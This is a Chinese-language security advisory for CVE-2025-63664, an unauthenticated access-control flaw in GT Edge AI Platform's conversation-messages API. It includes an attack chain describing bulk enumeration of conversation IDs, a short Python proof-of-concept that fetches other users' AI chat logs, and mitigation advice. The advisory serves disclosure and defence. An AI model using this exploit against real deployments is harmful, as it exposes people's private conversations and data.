CVE-2025-63664 GT Edge AI Platform 访问控制错误漏洞

漏洞信息

漏洞编号

CVE-2025-63664

漏洞类型

访问控制错误

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GT Edge AI Platform

漏洞概述

CVE-2025-63664是GT Edge AI Platform中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞源于/api/v1/conversations/*/messages API端点的访问控制机制存在缺陷。在受影响的版本（v2.0.10-dev之前）中，系统未能正确验证用户对特定对话消息的访问权限，导致任何未经授权的攻击者可以通过构造特定的API请求，访问其他用户与AI代理之间的聊天记录。此漏洞属于OWASP Top 10中的Broken Access Control类别，攻击者无需任何认证凭证即可利用此漏洞获取敏感信息。由于涉及用户与AI代理的私人对话内容，可能包含敏感业务信息、个人数据或专有知识，因此该漏洞具有较高的机密性影响。漏洞于2025年12月22日被披露，建议受影响的用户立即采取修复措施。

技术细节

该漏洞存在于GT Edge AI Platform的REST API接口/api/v1/conversations/*/messages中。攻击者可以通过遍历conversation ID来访问任意用户的聊天记录。具体来说，攻击者需要构造一个HTTP GET请求到/api/v1/conversations/{conversation_id}/messages端点，其中conversation_id是一个可预测或可枚举的整数或UUID。由于API未验证当前认证用户是否有权访问指定的conversation_id，服务器会直接返回该对话中的所有消息内容，包括用户与AI代理之间的完整交互历史。攻击者可以通过自动化脚本批量枚举有效的conversation_id，从而大规模窃取用户数据。该漏洞的利用无需任何身份认证（PR:N），攻击者只需能够访问网络即可发起攻击（AV:N）。修复方案需要在API层面添加严格的会话验证和资源所有权检查，确保用户只能访问自己所属的对话记录。

攻击链分析

STEP 1

步骤1

攻击者发现目标GT Edge AI Platform的/api/v1/conversations端点，通过API文档或流量分析获取接口结构

STEP 2

步骤2

攻击者获取有效的conversation_id列表，可通过枚举、暴力破解或信息泄露方式获取

STEP 3

步骤3

攻击者构造HTTP GET请求到/api/v1/conversations/{conversation_id}/messages，无需携带认证令牌

STEP 4

步骤4

服务器错误地返回请求的conversation中的所有消息内容，包括用户与AI代理的私密对话

STEP 5

步骤5

攻击者通过自动化脚本批量枚举conversation_id，大规模窃取用户敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63664 PoC - GT Edge AI Platform Unauthorized Access
# Target: /api/v1/conversations/*/messages API

def exploit(target_url, conversation_id):
    """
    Exploit for CVE-2025-63664
    Attempts to access messages from a specific conversation ID
    """
    endpoint = f"{target_url}/api/v1/conversations/{conversation_id}/messages"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "application/json"
    }
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: Retrieved messages for conversation {conversation_id}")
            print(f"Response: {response.json()}")
            return True
        elif response.status_code == 403:
            print(f"[-] Access Denied for conversation {conversation_id}")
        else:
            print(f"[-] Unexpected response: {response.status_code}")
        
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def main():
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <conversation_id>")
        print(f"Example: python {sys.argv[0]} https://gt-edge-ai.example.com 12345")
        sys.exit(1)
    
    target = sys.argv[1]
    conv_id = sys.argv[2]
    
    print(f"[*] Exploiting CVE-2025-63664 on {target}")
    print(f"[*] Target conversation ID: {conv_id}")
    
    exploit(target, conv_id)

if __name__ == "__main__":
    main()

影响范围

GT Edge AI Platform < v2.0.10-dev

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 通过Web应用防火墙（WAF）限制对/api/v1/conversations/*/messages端点的访问，仅允许经过完整身份验证的请求通过；2) 实施IP白名单策略限制API访问来源；3) 启用API请求速率限制防止攻击者批量枚举conversation_id；4) 监控API访问日志，识别异常的未授权访问行为；5) 考虑临时禁用相关API端点，待官方修复后再重新启用；6) 通知用户关于潜在的数据泄露风险，建议用户修改与AI代理交互中可能涉及的敏感信息。